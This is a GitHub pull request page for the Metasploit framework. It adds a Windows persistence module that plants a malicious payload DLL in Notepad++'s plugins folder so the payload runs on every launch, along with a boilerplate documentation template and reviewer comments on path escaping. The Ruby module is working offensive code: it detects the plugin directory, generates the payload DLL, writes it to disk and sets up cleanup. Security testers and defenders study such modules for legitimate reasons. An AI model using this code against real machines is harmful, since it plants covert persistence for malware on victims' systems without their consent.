Skip to content

Adds notepad++ persistence module for Windows #20685

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 10 commits into from
Nov 21, 2025
+190 −0
Merged

Adds notepad++ persistence module for Windows #20685

Show file tree
Hide file tree
Changes from 2 commits
Commits
Show all changes
10 commits
Select commit Hold shift + click to select a range
d4283cd
Adds base for Notepad++ persistence
msutovsky-r7 Nov 10, 2025
2cbf32c
Adds documentation base
msutovsky-r7 Nov 10, 2025
e35bd89
Expands check method
msutovsky-r7 Nov 12, 2025
58eec7d
Adds docs
msutovsky-r7 Nov 12, 2025
0e26719
Adds dll_exitprocess
msutovsky-r7 Nov 17, 2025
8285b43
Addresses comments
msutovsky-r7 Nov 17, 2025
6957f73
Adds architecture match check
msutovsky-r7 Nov 19, 2025
554c952
Adds payload name escaping
msutovsky-r7 Nov 19, 2025
d904a52
Shamefully removes pry and pry-byebug
msutovsky-r7 Nov 20, 2025
098af34
Fix payload name escaping
msutovsky-r7 Nov 21, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
40 changes: 40 additions & 0 deletions documentation/modules/exploit/windows/persistence/notepadpp_plugin_persistence.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,40 @@
## Vulnerable Application

Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
files, as well as instructions on installing/configuring the environment if it is different than a
standard install. Much of this will come from the PR, and can be copy/pasted.

## Verification Steps
Example steps in this format (is also in the PR):

1. Install the application
1. Start msfconsole
1. Do: `use [module path]`
1. Do: `run`
1. You should get a shell.

## Options
List each option and how to use it.

### Option Name

Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.

## Scenarios
Specific demo of using the module that might be useful in a real world scenario.

### Version and OS

```
code or console output
```

For example:

To do this specific thing, here's how you do it:

```
msf > use module_name
msf auxiliary(module_name) > set POWERLEVEL >9000
msf auxiliary(module_name) > exploit
```
79 changes: 79 additions & 0 deletions modules/exploits/windows/persistence/notepadpp_plugin_persistence.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,79 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::Local::Persistence
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Notepad++ Plugin Persistence',
'Description' => %q{
This module create persistence by adding malicious plugin to Notepad++. The application does not perform any checks on plugins its loading. The module drops malicious DLL into plugin directory. Upon starting the Notepad++, malicious DLL gets loaded and executed. This creates persistence mechanism as the DLL will get loaded upon every run of application.
Copy link
Contributor

@jvoisin jvoisin Nov 10, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
This module create persistence by adding malicious plugin to Notepad++. The application does not perform any checks on plugins its loading. The module drops malicious DLL into plugin directory. Upon starting the Notepad++, malicious DLL gets loaded and executed. This creates persistence mechanism as the DLL will get loaded upon every run of application.
This module create persistence by adding a malicious plugin to Notepad++, as it blindly loads and executes DLL from its plugin directory on startup, meaning that the payload will be executed every time Notepad++ is launched.

},
'License' => MSF_LICENSE,
'Author' => [ 'msutovsky-r7' ],
'Arch' => [ARCH_X64, ARCH_X86],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Targets' => [
[ 'Automatic', {} ]
],
'DisclosureDate' => '2005-12-11', # plugins were added to Notepad++
'DefaultTarget' => 0,
'References' => [
['URL', 'https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence']
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)

register_options(
[
OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
]
)
end

def get_plugin_dir
expand_path('%PROGRAMFILES%\\Notepad++\\plugins\\')
end

def check
@plugin_dir = get_plugin_dir
if directory?(@plugin_dir)
return CheckCode::Vulnerable('Notepad++ plugin directory detected')
end

CheckCode::Safe('Notepad++ is probably not present')
end

def install_persistence
@plugin_dir ||= get_plugin_dir

payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
payload_pathname = @plugin_dir + payload_name + '\\'
payload_exe = generate_payload_dll

vprint_good("Writing payload to #{payload_pathname}")

fail_with(Failure::UnexpectedReply, 'Error while creating malicious plugin directory') unless session.fs.dir.mkdir(payload_pathname)
Copy link
Contributor

@dwelch-r7 dwelch-r7 Nov 13, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

is session.fs compatible with shell sessions?


fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname + payload_name + '.dll', payload_exe)
Copy link
Contributor

@dwelch-r7 dwelch-r7 Nov 13, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname + payload_name + '.dll', payload_exe)
fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname + '.dll', payload_exe)

I think payload_pathname already includes payload_name

Copy link
Contributor Author

@msutovsky-r7 msutovsky-r7 Nov 17, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yeah it does, but the module creates plugin subdirectory called payload_name and it creates payload_name.dll inside that new subdirectory


vprint_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_pathname}")
@clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"
Copy link
Contributor

@jvoisin jvoisin Nov 10, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

What if payload_pathname contains "?

Copy link
Contributor

@dwelch-r7 dwelch-r7 Nov 13, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

We have a new API for handling this type of thing, it could be used here https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/base/sessions/windows_escaping.rb#L38

end
end
Loading